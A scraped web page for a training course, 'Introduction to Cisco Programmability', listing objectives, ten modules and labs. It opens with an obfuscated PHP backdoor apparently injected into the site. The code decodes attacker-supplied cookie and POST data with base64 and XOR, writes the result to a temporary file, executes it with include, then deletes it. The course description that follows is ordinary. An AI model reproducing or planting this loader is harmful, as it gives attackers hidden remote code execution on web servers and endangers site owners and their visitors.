$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Introduction to Cisco Programmability|Grupo Loyal

Introduction to Cisco Programmability

Introduction to Cisco Programmability

This course provides a comprehensive introduction to the methods, applications and utilities available to programmatically deploy and manage Cisco devices. You will learn about the tools and techniques needed for Cisco programmability and will practice these before using them to solve scenario based challenges. The course will provide you with a foundational set of Cisco programmability skills using a variety of tools, a clear grasp of the terminology and options available and an understanding of which tools and techniques you will subsequently benefit from diving deeper into.

Objetivos

After completing this course you should be able to:

Compare and contrast examples of why programmability is needed and how this need is growing.
Review, download, and install various tools and techniques needed for Cisco programmability.
Create Python scripts to automate device administration.
Manage Cisco devices using the Cisco NX-API.
Manage Cisco ACI via the APIC GUI, Visore, & API Inspector.
Introduce Microsoft PowerShell Automate UCS PowerShell scripts with “Convert to UCS Commandlet”.
Deploy VMware’s Orchestrator and PowerCLI.
Create Orchestrator jobs and PowerCLI script.

Software Development

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Acceso al campus

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
15 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Administrators, Engineers, and Managers with a need to understand how to configure, monitor, or troubleshoot Cisco devices through programming.

Conocimientos requeridos

Attendees should meet the forllowing prerequisites:

Knowledge of Cisco devices but not necessarily of programming

Temario

Module 1: Initial Device Configuration for Management Connectivity

Module 2: Cisco Programmability Tools

Module 3: NX-API and Postman

Module 4: Python Fundamentals

Module 5: Working with JSON and XML Data Formats

Module 6: Building Device Configurations with Python

Module 7: ACI Programmability Tools

Module 8: PowerShell

Module 9: UCS PowerTool Foundations

Module 10:VMware PowerCLI & Orchestrator Basic

Labs:

Lab 1: Perform initial device configuration
Lab 2: Research Cisco programmability tools
Lab 3: Check device status using NX-API and Postman
Lab 4: Install the Python software development kit and navigate its features
Lab 5: Compare and Contrast the JSON vs. XML formats and convert between the two
Lab 6: Use Python to configure basic device settings
Lab 7: Navigate the ACI APIC GUI to explore available programming tools
Lab 8: Download and Install PowerShell and Snap-ins
Lab 9: Apply a Cisco UCS Logical Server build
Lab 10: Automate vSphere with PowerCLI and Orchestrator

Solicita información del curso

It Formacion

It Formacion